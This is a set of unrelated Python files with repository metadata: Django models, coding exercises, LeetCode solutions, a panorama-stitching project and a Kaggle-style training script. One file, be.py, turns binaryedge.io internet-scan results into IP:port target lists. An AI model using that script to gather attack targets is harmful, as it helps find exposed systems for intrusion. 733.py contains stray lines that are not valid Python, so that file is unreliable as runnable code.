('society', models.CharField(choices=[('TNT', 'Thapar Nautanki Team'), ('SCIM', 'Scimatics'), ('IETE', 'The Institution of Electronics and Telecommunication Engineers'), ('CCS', 'Creative Computing Society'), ('LitSoc', 'Literary Society'), ('Mudra', 'Music and Drama Society'), ('FAPS', 'FINE ARTS AND PHOTOGRAPHY SOCIETY')], max_length=20)),
('ident_no', models.IntegerField(primary_key=True, serialize=False)),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='PaymentSuccess',
fields=[
('transaction_id', models.CharField(max_length=100, primary_key=True, serialize=False)),
('dateOfPayment', models.DateField()),
('registration_id', models.CharField(default='', max_length=100)),
],
),
migrations.CreateModel(
name='Registration',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('registration_id', models.CharField(default='', max_length=100)),
('email_alerts', models.BooleanField(default=True)),
('event_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Events')),
],
),
migrations.CreateModel(
name='Student',
fields=[
('name', models.CharField(max_length=120)),
('email_id', models.EmailField(max_length=254)),
('phone_no', models.IntegerField()),
('userType', models.CharField(default='x', max_length=1)),
('roll_no', models.IntegerField(primary_key=True, serialize=False)),
('event_part', models.ManyToManyField(through='articles.Registration', to='articles.Events')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='Transactions',
fields=[
('student_id', models.CharField(max_length=100)),
('event_id', models.CharField(max_length=100)),
('transaction_id', models.CharField(max_length=100, primary_key=True, serialize=False)),
('reg_fee', models.IntegerField(default=0)),
],
),
migrations.AddField(
model_name='registration',
name='part_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Student'),
),
migrations.AddField(
model_name='events',
name='organizer_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='articles.Organizer'),
),
migrations.AlterUniqueTogether(
name='registration',
unique_together={('part_id', 'event_id')},
),
]
| [
"anish.mendiratta@gmail.com"
] | anish.mendiratta@gmail.com |
87a23af5f698baae4449c2df99047b6047ead027 | 9fc136019eb91f00ad4aaf25a3d721016410b691 | /201.2/_filter.py | ec89bcce5d6ae784eb9d42dab0b4746cb20bf876 | [] | no_license | kubruslihiga/curso_python | 02626005db141bb1d35e08effa57d9fd467e6ae6 | a64befc0a53042a7616e4460c58add4ae4e5f6e0 | refs/heads/master | 2020-06-04T11:19:08.928302 | 2019-06-14T20:07:13 | 2019-06-14T20:07:13 | 191,999,181 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | def filter_division_8(my_list):
return list(filter(lambda x: x % 8 == 0, my_list))
print(filter_division_8([0, 1, 8, 16, 54, 34, 12, 45, 64]))
| [
"teste@teste.com"
] | teste@teste.com |
ef1f73ac545d810881ae472c0b7440b0b94ec766 | 8bb367e6a730af9c1e4145bcd26615d9ea24f010 | /employeemanagementsystem/pollapp/admin.py | e6cc56495762f37c7896a1e0eb52a2261869100d | [] | no_license | bhanugithubb/ems | 772a8347e787332bd9594335ad91aa64d15c4f6e | f1277db13717f0bd7cdb24930941ff0db4541346 | refs/heads/main | 2023-01-06T13:19:24.079249 | 2020-11-09T06:45:05 | 2020-11-09T06:45:05 | 311,245,127 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 180 | py | from django.contrib import admin
# Register your models here.
from pollapp.models import *
admin.site.register(Question)
admin.site.register(Choice)
admin.site.register(Answer)
| [
"bhanugithub@gmail.com"
] | bhanugithub@gmail.com |
04a68ad3ab8b4ec6864b03ef75267f662293f58b | 665f255c8a2cad2952696f67423ea20895607dbc | /home/migrations/0001_initial.py | 2a3e69a6b0f1e387e3c172807b2a66f9e6e0da40 | [] | no_license | brajeswar009/GeekyWorld | 4af8dea70b686f15bf40881eee2074f56650bf0e | f1dc8f9dff612adde48400a8d2c4d1535cfca7be | refs/heads/master | 2023-04-23T04:16:56.922320 | 2021-05-13T11:36:44 | 2021-05-13T11:36:44 | 297,211,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 632 | py | # Generated by Django 3.1.1 on 2020-09-18 09:57
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('sno', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=100)),
('email', models.CharField(max_length=100)),
('content', models.TextField()),
('timeStamp', models.DateTimeField(auto_now_add=True)),
],
),
]
| [
"brajeswar.lenka@gmail.com"
] | brajeswar.lenka@gmail.com |
5a8ff86f8aac8001fcbcefd81abf93f19556a628 | e58a944df179b9b792c4640cb587a5d40ebdabd0 | /be.py | a30bbf794754c3a3039f22d38fc59119c1a5dd12 | [] | no_license | kalikex1/be-targets-gen | 1cadefd79ce1b0dc0bf793683fa62b82f936e33e | 0f97487df522f4b28ca20c8a295ad68742f9f810 | refs/heads/master | 2023-06-09T18:29:54.874111 | 2020-04-17T09:24:40 | 2020-04-17T09:24:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 806 | py | #!/usr/bin/env python3
#
# Targets Generator to parse binaryedge.io json blob
#
# python3 be.py -f b3cef281-4s1a-4k45-8lv6-d42196c63b5f
#
# Author: RandomRobbieBF
import json
import argparse
import sys
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--file", required=True, help="Binary Edge Json File")
args = parser.parse_args()
fname = args.file
try:
with open(fname) as f:
for line in f:
json_string = json.loads(line)
IP = json_string["target"]["ip"]
PORT = str(json_string["target"]["port"])
URL = ""+IP+":"+PORT+""
print (URL)
text_file = open(""+fname+".txt", "a")
text_file.write(""+URL+"\n")
text_file.close()
except KeyboardInterrupt:
print ("Ctrl-c pressed ...")
sys.exit(1)
except Exception as e:
print('Error: %s' % e)
sys.exit(1)
| [
"noreply@github.com"
] | kalikex1.noreply@github.com |
b22e16d140a7a9a6a2c7f916d502601d2b841de3 | f002387dfd7c8ccf66b6467f45b8376d14fbe021 | /B5/B5.py | 26c113fe61abeddf10c42484966021561e00648c | [] | no_license | Tarun-msrit/pylab | d37e7ef5d892d723d2a3cb9615e9283f4d942478 | 5248aed668ea0f232fca4f86b9ef9999d85e5ec6 | refs/heads/master | 2020-08-21T15:55:54.112355 | 2019-11-20T17:31:01 | 2019-11-20T17:31:01 | 216,162,130 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | import sys
import os
from functools import reduce
dict={}
wordLen=[]
if(len(sys.argv)!=2):
print("Invalid arguments")
sys.exit()
if(not(os.path.exists(sys.argv[1]))):
print("invalid file path")
sys.exit()
if(sys.argv[1].split('.')[-1]!="txt"):
print("invalid File Format. Only TXT files allowed")
with open(sys.argv[1]) as file:
for line in file:
for word in line.split():
dict[word]=dict.get(word,0)+1
print(dict)
sl=[]
sl=sorted(dict.items(),key=lambda x:x[1],reverse=True)
print(sl[:10])
word=[]
for i,j in sl[:10]:
word.append(len(i))
print(word)
sum=reduce((lambda x,y:x+y),word)
print ("sum is",sum)
avg=sum/len(word)
print ("Avg is",avg)
sq=[]
sq=[x*x for x in word if x%2 != 0]
print(sq) | [
"tarun.ragothaman@gmail.com"
] | tarun.ragothaman@gmail.com |
adbfff0ec7d9153be0fa04207d65d82f79536304 | 31b6e455820b6930992ce5f3e4e4d4ec8516c9ec | /mymod/mod2.py | 848f4b1e7c79da2fc3afdf13385b70613ce4c869 | [] | no_license | blackcow59/Jump-to-python | fa699337f2dd3579e717a1e08430d0a561c79c8c | f5b05f369772599811866e4674a63f232655ec4b | refs/heads/master | 2023-02-20T13:41:32.485999 | 2021-01-24T08:18:31 | 2021-01-24T08:18:31 | 329,690,563 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 116 | py | PI = 3.141592
class Math :
def solv(self, r) :
return PI * (r ** 2)
def add(a, b) :
return a + b
| [
"choi8695@gmail.com"
] | choi8695@gmail.com |
ba31752daebd6125e2355792eb7cbce0f3cd9586 | 03f05bb069e6b24b35f60206210710b944739b48 | /test.py | 42d933e1b246a7eb41c80c669838803a233703b9 | [] | no_license | steven159486/test | bb407c09b3bd13a102fa78c0f7d94fa315384856 | 3ffc50ba8f63b00856879fdc904ea8a1184a95fe | refs/heads/master | 2022-12-05T11:51:49.988607 | 2020-08-25T02:41:44 | 2020-08-25T02:41:44 | 290,093,852 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10 | py | imoprt os
| [
"steven159486@gmail.com"
] | steven159486@gmail.com |
6f1bae782360db20439167864f836fc8db51e16b | b4f2b3b8c8a5c6015ad90facf3d4b2c031f9d1a6 | /Python1100/Study/MyFunc.py | 99630495df005a9271b0e3d7f56ec642eee2f204 | [] | no_license | soft9000/Python1000 | 141b0d0cf99d26ff915a28c40d27179ec9dc1490 | d63179cad6a8ac6285d972a9566da75d767e7bc8 | refs/heads/master | 2022-11-12T11:53:33.215224 | 2020-07-11T07:18:49 | 2020-07-11T07:18:49 | 268,032,418 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py |
# Adding Documentation
def MyFunc():
""" This is a docstring """
print("Hello World")
MyFunc() # Call it (optional)
input("Press the enter key to continue....")
| [
"noreply@github.com"
] | soft9000.noreply@github.com |
ab35af3c24ceb2783a0fb929e5e3ee4e727ea248 | 869693633a0ff3081906d93fd77c7315f26c1f1e | /lab8import.py | aca7387b532e002fd4d7ed3d7ffe88be4131a46e | [] | no_license | neKeyoff/Python_Task-of-University | 91036930e004b1a86335a1b4d4100109ab7b1c0a | 9ddb3df49d77c18c426e2b834321573ca1ef2c09 | refs/heads/main | 2023-08-20T11:23:45.293309 | 2021-10-30T16:24:28 | 2021-10-30T16:24:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 389 | py | import random
import math
def f1(x1, x2):
return float(x1) + float(x2)
def f2(x1, x2):
return x1 - x2
def f3(x1, x2):
return x1 * x2
def f4(x1, x2):
return x1 / x2
def f5(x1, x2):
return pow(x1, x2)
def f6(x):
return abs(x)
def f7(x1, x2):
return random.uniform(x1, x2)
def f8(x):
return math.factorial(x)
def f9(x):
return math.acos(x) | [
"78197151+neKeyoff@users.noreply.github.com"
] | 78197151+neKeyoff@users.noreply.github.com |
78b9354c6c32861f115d542c379f97fbb94db9d6 | 3bc38b6fc9570217143d056762be4bf52db2eb1f | /leetcode_practice/733.py | 04891ca0037b51b72b6e6aab58a893d403d3b54f | [] | no_license | yangyuebfsu/ds_study | 6638c260dfdb4a94365c2007d302833b455a4a59 | 883f9bab2dbce4f80f362c30b8564a942f66fb1e | refs/heads/master | 2021-02-07T13:20:54.773840 | 2021-01-21T05:55:09 | 2021-01-21T05:55:09 | 244,031,249 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,880 | py | ***
733. Flood Fill
Easy
1121
190
Add to List
Share
An image is represented by a 2-D array of integers, each integer representing the pixel value of the image (from 0 to 65535).
Given a coordinate (sr, sc) representing the starting pixel (row and column) of the flood fill, and a pixel value newColor, "flood fill" the image.
To perform a "flood fill", consider the starting pixel, plus any pixels connected 4-directionally to the starting pixel of the same color as the starting pixel, plus any pixels connected 4-directionally to those pixels (also with the same color as the starting pixel), and so on. Replace the color of all of the aforementioned pixels with the newColor.
At the end, return the modified image.
Example 1:
Input:
image = [[1,1,1],[1,1,0],[1,0,1]]
sr = 1, sc = 1, newColor = 2
Output: [[2,2,2],[2,2,0],[2,0,1]]
Explanation:
From the center of the image (with position (sr, sc) = (1, 1)), all pixels connected
by a path of the same color as the starting pixel are colored with the new color.
Note the bottom corner is not colored 2, because it is not 4-directionally connected
to the starting pixel.
***
class Solution:
def floodFill(self, image: List[List[int]], sr: int, sc: int, newColor: int) -> List[List[int]]:
area=[]
oldColor=image[sr][sc]
def search_area(x,y):
if ( [x,y] in area)|(x<0)|(x>len(image)-1)|(y<0)|(y>len(image[0])-1):
return
elif image[x][y]!=oldColor:
return
else:
area.append([x,y])
search_area(x-1,y)
search_area(x+1,y)
search_area(x,y-1)
search_area(x,y+1)
search_area(sr,sc)
for point in area:
image[point[0]][point[1]]=newColor
return image
| [
"yueyang@yuedeMacBook-Pro.local"
] | yueyang@yuedeMacBook-Pro.local |
78a9d21635b3b2f9d4282deb74507c8b86a89628 | ea2015881c18583a4295122f2e2c1d2dbd3e32f9 | /_pipeline_scripts/script_6.4.3_ps_prot_pairDave.py | 6b12ef0ebf30ba4e369c2c941843af7dcdf42b21 | [] | no_license | panchyni/PseudogenePipeline | ad0b210d943bfdc83da1eeb63c0d7dec2a8719ae | 44a5bfd034dfd9b21808b6e6c5b789f141912c33 | refs/heads/master | 2021-01-11T15:54:57.514872 | 2017-04-17T21:13:16 | 2017-04-17T21:13:16 | 79,955,253 | 4 | 2 | null | null | null | null | UTF-8 | Python | false | false | 651 | py |
import sys
print "Read protein sequence file..."
inp = open(sys.argv[1])
inl = inp.readlines()
p = {}
for i in inl:
if i[0] == ">":
g = i[1:-1].split(".")
if g[0] not in p:
p[g[0]] = [g[1]]
else:
p[g[0]].append(g[1])
print "Read pair file..."
inp = open(sys.argv[2]) # osv5_ps_gene.pairs
oup = open("osv5_ps_prot.pairs","w")
inl = inp.readlines()
miss = []
for i in inl:
L = i[:-1].split("\t")
if L[1] in p:
for j in p[L[1]]:
oup.write("%s\t%s.%s\n" % (L[0],L[1],j))
else:
if L[1] not in miss:
miss.append(L[1])
print "The following genes are not in the prot seq file:"
for i in miss:
print "",i
print "Done!"
| [
"panchyni.msu.edu"
] | panchyni.msu.edu |
7fc926973ef2d59e20c9d57230e6563df921d769 | a4497fa4e254216b50071c7967e2b821b7b61f30 | /Project7b/manual.py | ad98269f58a6e7d81a74605ac5fae0a62a61cbd8 | [] | no_license | TungTNguyen/computational_photography | c740871f90d3e55464acc929386306cd6c31be45 | 5f707c2cc0c7d41d415b1eaadcdbdd0d58430e9b | refs/heads/master | 2021-01-12T06:08:05.949269 | 2015-12-30T07:25:41 | 2015-12-30T07:25:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,213 | py | #================================================================================
#
# University of California, Berkeley
# CS194-26 (CS294-26): Computational Photography
#
#================================================================================
#
# Project 7 - Part A: "Image Warping and Mosaicing - Homographies"
#
# Student: Ian Albuquerque Raymundo da Silva
# Email: ian.albuquerque@berkeley.edu
#
#================================================================================
#
# Special thanks to Alexei Alyosha Efros, Rachel Albert and Weilun Sun for help
# during lectures, office hours and questions on Piazza.
#
#================================================================================
#================================================================================
# CONSTANTS AND SETTINGS
#================================================================================
RECTIFICATION_FILE_NAME = "inputs/rectification/times_square.jpg"
PLANAR_PANORAMA_FOLDER = "inputs/planar"
CYLINDRICAL_PANORAMA_FOLDER = "inputs/cylindrical"
PANORAMA_360_FOLDER = "inputs/360"
F_FRACTION_OF_WIDTH = 0.75
RESULTING_RECTIFICATION_WIDTH = 800
RESULTING_RECTIFICATION_HEIGHT = 600
RECTIFICATION_BORDER_FRACTION = 0.1
#================================================================================
# THE CODE ITSELF
#================================================================================
from skimage.draw import polygon
import numpy as np
import matplotlib.pyplot as plt
import math
import copy
import transforms
import pointselecter
import imageio
#================================================================================
def defineMergedImageDimensions(image_1, image_2, H):
image_1_height = image_1.shape[0]
image_2_height = image_2.shape[0]
image_1_width = image_1.shape[1]
image_2_width = image_2.shape[1]
img1_pts = [(0,0),(image_1_width-1,0),(0,image_1_height-1),(image_1_width-1,image_1_height-1)]
img2_pts = [(0,0),(image_2_width-1,0),(0,image_2_height-1),(image_2_width-1,image_2_height-1)]
trans_img1_pts = []
for pt in img1_pts:
trans_img1_pts.append(transforms.applyHomogTransformation(H,pt))
pts_to_check = trans_img1_pts + img2_pts
pts_x, pts_y = zip(*pts_to_check)
top_left = (min(pts_x),min(pts_y))
bottom_right = (max(pts_x),max(pts_y))
return top_left, bottom_right
def generateDistMask(W,H):
mask = np.zeros((H,W))
pixels = np.where(mask == 0)
for y,x in zip(pixels[0],pixels[1]):
mask[y,x] = min([1,min([y,H-y,x,W-x])**0.90/(0.1*max([W,H])/2)])
return mask
def fill(source,target,T,current_source_mask=None):
source_height = source.shape[0]
source_width = source.shape[1]
target_height = target.shape[0]
target_width = target.shape[1]
pts_source = [(0,0),(source_width-1,0),(source_width-1,source_height-1),(0,source_height-1)]
pts_target = []
for pt in pts_source:
pts_target.append(transforms.applyHomogTransformation(T,pt))
pts_target_x, pts_target_y = zip(*pts_target)
is_someone_in = False
for pt in pts_target:
if pt[0] < target_width and pt[0] >= 0 and pt[1] < target_height and pt[1] >= 0:
is_someone_in = True
break
if is_someone_in:
fill_mask = np.zeros((target_height,target_width))
rr, cc = polygon(np.array(pts_target_y), np.array(pts_target_x),fill_mask.shape)
fill_mask[rr, cc] = 1
target_pixels = np.where(fill_mask == 1)
else:
fill_mask = np.ones((target_height,target_width))
target_pixels = np.where(fill_mask == 1)
T_inv = np.linalg.inv(T)
transformed_mask = np.zeros((target_height,target_width))
if current_source_mask == None:
blend_mask = generateDistMask(source_width,source_height)
else:
blend_mask = current_source_mask
mask_height = blend_mask.shape[0]
mask_width = blend_mask.shape[1]
for y,x in zip(target_pixels[0],target_pixels[1]):
original_pixel_coords = transforms.applyHomogTransformation(T_inv,(x,y))
original_pixel_x = int(original_pixel_coords[0])
original_pixel_y = int(original_pixel_coords[1])
if original_pixel_x < source_width and original_pixel_x >= 0 and original_pixel_y < source_height and original_pixel_y >= 0:
original_pixel = source[original_pixel_y,original_pixel_x]
else:
original_pixel = 0
if original_pixel_x < mask_width and original_pixel_x >= 0 and original_pixel_y < mask_height and original_pixel_y >= 0:
mask_pixel = blend_mask[original_pixel_y,original_pixel_x]
else:
mask_pixel = 0
transformed_mask[y,x] = mask_pixel
if target[y,x][0] == 0 or target[y,x][1] == 0 or target[y,x][1] == 0:
target[y,x] = original_pixel
else:
target[y,x] = original_pixel*transformed_mask[y,x] + (1-transformed_mask[y,x])*target[y,x]
return target
def merge(image_1, image_2, H, mask = None):
image_1_height = image_1.shape[0]
image_2_height = image_2.shape[0]
image_1_width = image_1.shape[1]
image_2_width = image_2.shape[1]
top_left_float, bottom_right_float = defineMergedImageDimensions(image_1, image_2, H)
top_left = (int(math.floor(top_left_float[0])),int(math.floor(top_left_float[1])))
bottom_right = (int(math.ceil(bottom_right_float[0])),int(math.ceil(bottom_right_float[1])))
result_height = bottom_right[1] - top_left[1] + 1
result_width = bottom_right[0] - top_left[0] + 1
result_image = 0*np.ones((result_height,result_width,3))
T = np.matrix([[1,0,-top_left[0]],[0,1,-top_left[1]],[0,0,1]])
result_image = fill(image_2,result_image,T,mask)
result_image = fill(image_1,result_image,np.dot(T,H),mask)
empty_pixels = np.where(result_image == 0)
result_image[empty_pixels] = 0
return result_image
def projectOnCylinder(source,current_source_mask=None):
source_height = source.shape[0]
source_width = source.shape[1]
W = source_width
H = source_height
F = F_FRACTION_OF_WIDTH*W
result_image = np.zeros((H,W,3))
target_pixels = np.where(result_image == 0)
if current_source_mask == None:
blend_mask = generateDistMask(source_width,source_height)
else:
blend_mask = current_source_mask
transformed_mask = np.zeros((H,W))
for y,x in zip(target_pixels[0],target_pixels[1]):
original_pixel_coords = transforms.fromCylinderToPlane(x,y,W/2.0,H/2.0,F)
original_pixel_x = int(original_pixel_coords[0])
original_pixel_y = int(original_pixel_coords[1])
if original_pixel_x < source_width and original_pixel_x >= 0 and original_pixel_y < source_height and original_pixel_y >= 0:
original_pixel = source[original_pixel_y,original_pixel_x]
mask_pixel = blend_mask[original_pixel_y,original_pixel_x]
else:
original_pixel = 0
mask_pixel = 0
transformed_mask[y,x] = mask_pixel
result_image[y,x] = original_pixel
return result_image, transformed_mask
def mergeImages(points_1, points_2, source, reference, transformFunction, mask = None):
print "Processing..... Please, wait."
T = transformFunction(points_1,points_2)
merged_image = merge(source,reference,T,mask)
return merged_image
#================================================================================
def runPanoramaPlane(folder_name):
file_names = imageio.getImageNames(folder_name)
panorama = imageio.readImageFloat(file_names[0])
for file_name in file_names[1:]:
new_image = imageio.readImageFloat(file_name)
points_1, points_2 = pointselecter.getPoints(source,reference)
panorama = mergeImages(points_1,points_2,new_image,panorama,transforms.computeHomography)
print "Displaying the result so far:"
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
def runPanoramaCylinder(folder_name):
file_names = imageio.getImageNames(folder_name)
panorama,mask = projectOnCylinder(imageio.readImageFloat(file_names[0]))
for file_name in file_names[1:]:
new_image,new_mask = projectOnCylinder(imageio.readImageFloat(file_name))
points_1, points_2 = pointselecter.getPoints(source,reference)
panorama = mergeImages(points_1,points_2,new_image,panorama,transforms.computeTranslation,new_mask)
print "Displaying the result so far:"
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
def runPanoramaCylinderFull(folder_name):
file_names = imageio.getImageNames(folder_name)
panorama,mask = projectOnCylinder(imageio.readImageFloat(file_names[0]))
for file_name in file_names[1:]:
new_image,new_mask = projectOnCylinder(imageio.readImageFloat(file_name))
points_1, points_2 = pointselecter.getPoints(source,reference)
panorama = mergeImages(points_1,points_2,new_image,panorama,transforms.computeTranslation,new_mask)
print "Displaying the result so far:"
figure, axis = plt.subplots(ncols=1)
axis.imshow(panorama, vmin=0, vmax=1)
plt.show()
panorama_width = panorama.shape[1]
points_1, points_2 = pointselecter.getPoints(source,reference)
image360 = mergeImages(points_1,points_2,panorama,panorama,transforms.computeTranslation,new_mask)
image360_width = image360.shape[1]
image360 = image360[:,0.25*image360_width:0.25*image360_width+(panorama_width-(2*panorama_width-image360_width))]
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(image360, vmin=0, vmax=1)
plt.show()
def runRectification(image_name):
img = imageio.readImageFloat(image_name)
points = pointselecter.getFourPoints(img)
print "Processing..... Please, wait."
D_W = RESULTING_RECTIFICATION_WIDTH
D_H = RESULTING_RECTIFICATION_HEIGHT
border = RECTIFICATION_BORDER_FRACTION
points_view = np.array([(border*D_W,border*D_H),((1-border)*D_W,border*D_H),((1-border)*D_W,(1-border)*D_H),(border*D_W,(1-border)*D_H)])
H = transforms.computeHomography(points,points_view)
pts_x, pts_y = zip(*points)
result_image = 0*np.ones((D_H,D_W,3))
fill(img,result_image,H)
print "Displaying the final result."
figure, axis = plt.subplots(ncols=1)
axis.imshow(result_image, vmin=0, vmax=1)
plt.show()
#================================================================================
# Runs the application!
if __name__ == '__main__':
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
print ">> University of California, Berkeley"
print ">> CS194-26 (CS294-26): Computational Photography"
print "==============================================="
print "==============================================="
print ">> Project 7a: Image Warping and Mosaicing - Homographies"
print ">> Student: Ian Albuquerque Raymundo da Silva"
print ">> Email: ian.albuquerque@berkeley.edu"
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
option = raw_input("Choose an option:\n0 = Rectification\n1 = Planar Projection\n2 = Cylindrical Projection\n3 = 360 Planorama\nWrite Option Here: >> ")
if option == "0":
runRectification(RECTIFICATION_FILE_NAME)
elif option == "1":
runPanoramaPlane(PLANAR_PANORAMA_FOLDER)
elif option == "2":
runPanoramaCylinder(CYLINDRICAL_PANORAMA_FOLDER)
elif option == "3":
runPanoramaCylinderFull(PANORAMA_360_FOLDER)
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
print ">> Have a good day!"
print "==============================================="
print "==============================================="
print "============== GO BEARS!!!!!!!! ==============="
print "==============================================="
print "==============================================="
| [
"ian.albuquerque.silva@gmail.com"
] | ian.albuquerque.silva@gmail.com |
913b6d6712f12af4cd52f808555df65736a46b39 | b56c79690ea0d211b2a09c752620cb3b573d5920 | /ext/events.py | 67e034a77cdd979957493abc14ea1fd789a449f8 | [] | no_license | N8BMAN/MemeBot | 28b4fc26ed8c854160410a5b3118a50430837aa9 | 929b9eb592d262476d1d36686e69f40ff89285bb | refs/heads/master | 2020-03-22T06:58:12.131883 | 2019-12-16T20:25:05 | 2019-12-16T20:25:05 | 139,669,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | import discord, asyncio
from discord.ext import commands
class Events(commands.Cog):
def __init__(self, meme):
self.meme = meme
self.recentBans = []
@commands.Cog.listener()
async def on_member_remove(self, member):
try:
invite = await member.guild.system_channel.create_invite(max_uses=1)
if not member.dm_channel:
await member.create_dm()
channel = member.dm_channel
await channel.send(invite)
self.recentBans.append(member)
except Exception as e:
print(f"Couldn't send invite to {member.name}: {e}")
@commands.Cog.listener()
async def on_member_ban(self, guild, member):
await guild.unban(member)
@commands.Cog.listener()
async def on_member_join(self, member):
if member in self.recentBans:
await member.add_roles(self.recentBans[self.recentBans.index(member)].top_role)
self.recentBans.remove(member)
def setup(meme):
meme.add_cog(Events(meme)) | [
"nate.bowman125@gmail.com"
] | nate.bowman125@gmail.com |
a07caa95edb7398b9588e8dbf134ba5d00978be0 | 977073b97242b8bf48b49e145395d8d948890924 | /experiments/run_submission.py | 0aaa1722561252ba0e1393e56e7ad046f830a6f5 | [] | no_license | upura/booking-challenge-2021 | c80e88f8545ae1b5b8e3d9da3bac49f3ea982ee5 | 7b6daa2fabd28773cc452cd6605861372ea64d78 | refs/heads/master | 2023-03-03T16:22:45.258906 | 2021-02-17T20:36:06 | 2021-02-17T20:36:06 | 325,207,679 | 10 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,768 | py | import gc
import numpy as np
import pandas as pd
from sklearn import preprocessing
import torch
from torch.utils.data import DataLoader
from tqdm import tqdm
from src.datasets import load_train_test, BookingDataset
from src.models import BookingNN
from src.utils import seed_everything
from src.runner import CustomRunner
if __name__ == '__main__':
seed_everything(0)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
print(device)
categorical_cols = [
'user_id',
# 'device_class',
# 'affiliate_id',
'booker_country',
# 'hotel_country'
]
train_test = load_train_test()
cat_dims = [int(train_test[col].nunique()) for col in categorical_cols]
emb_dims = [(x, min(50, (x + 1) // 2)) for x in cat_dims]
target_le = preprocessing.LabelEncoder()
train_test['city_id'] = target_le.fit_transform(train_test['city_id'])
for c in categorical_cols:
le = preprocessing.LabelEncoder()
train_test[c] = le.fit_transform(train_test[c].astype(str).fillna('unk').values)
test = train_test[~train_test['row_num'].isnull()]
test_trips = test[test['city_id'] != test['city_id'].shift(1)].query('city_id!=0').groupby('utrip_id')['city_id'].apply(lambda x: x.values).reset_index()
X_test = test[test['city_id'] != test['city_id'].shift(1)].query('city_id!=0').groupby('utrip_id')[categorical_cols].last().reset_index()
X_test['city_id'] = test_trips['city_id']
X_test = X_test.reset_index(drop=True)
test_dataset = BookingDataset(X_test, is_train=False)
test_loader = DataLoader(test_dataset,
shuffle=False,
batch_size=1)
del train_test, test, test_trips
gc.collect()
model_paths = [
'../input/booking-bi-lstm-ep1/logdir_nn000',
]
for mp in model_paths:
for fold_id in (0,):
runner = CustomRunner(device=device)
model = BookingNN(len(target_le.classes_))
pred = []
for prediction in tqdm(runner.predict_loader(loader=test_loader,
resume=f'{mp}/fold{fold_id}/checkpoints/best.pth',
model=model,)):
pred.append(target_le.inverse_transform(np.argsort(prediction.cpu().numpy()[-1, :])[-4:]))
pred = np.array(pred)
np.save(f"y_pred{mp.replace('/', '_').replace('.', '')}_fold{fold_id}", pred)
submission = pd.concat([
X_test['utrip_id'],
pd.DataFrame(pred, columns=['city_id_1', 'city_id_2', 'city_id_3', 'city_id_4'])
], axis=1)
print(submission.head())
submission.to_csv('submission.csv', index=False)
| [
"upura0@gmail.com"
] | upura0@gmail.com |
263f9d74b0c56b54ae61b705fc78e35537aa37aa | 1bdf38834c22b0100595cb22f2862fd1ba0bc1e7 | /code394DecodeString.py | 6498e6f8c2f6d46d2cadc4e51089b069f52ef7bd | [] | no_license | cybelewang/leetcode-python | 48d91c728856ff577f1ccba5a5340485414d6c6e | 635af6e22aa8eef8e7920a585d43a45a891a8157 | refs/heads/master | 2023-01-04T11:28:19.757123 | 2020-10-29T05:55:35 | 2020-10-29T05:55:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,120 | py | """
394 Decode String
Given an encoded string, return it's decoded string.
The encoding rule is: k[encoded_string], where the encoded_string inside the square brackets is being repeated exactly k times. Note that k is guaranteed to be a positive integer.
You may assume that the input string is always valid; No extra white spaces, square brackets are well-formed, etc.
Furthermore, you may assume that the original data does not contain any digits and that digits are only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].
Examples:
s = "3[a]2[bc]", return "aaabcbc".
s = "3[a2[c]]", return "accaccacc".
s = "2[abc]3[cd]ef", return "abcabccdcdcdef".
"""
class Solution:
# OJ's best
def decodeString(self, s):
stack = []; curNum = 0; curString = ''
for c in s:
if c == '[':
stack.append(curString)
stack.append(curNum)
curString = ''
curNum = 0
elif c == ']':
num = stack.pop()
prevString = stack.pop()
curString = prevString + num*curString
elif c.isdigit():
curNum = curNum*10 + int(c)
else:
curString += c
return curString
# my solution
def decodeString2(self, s):
"""
:type s: str
:rtype: str
"""
stack, num = [''], 0
for c in s:
if c.isdigit():
num = num*10 + ord(c) - ord('0')
elif c == '[':
stack.append(num)
stack.append('')
num = 0
elif c == ']':
sub = stack.pop()
count = stack.pop()
stack[-1] += sub*count
num = 0
else:
stack[-1] += c
num = 0
return stack[-1]
obj = Solution()
test_cases = ['', 'abcde', '3[a]2[bc]', '3[a2[c]]', '2[abc]3[cd]ef']
for case in test_cases:
print(obj.decodeString(case)) | [
"guoligit@gmail.com"
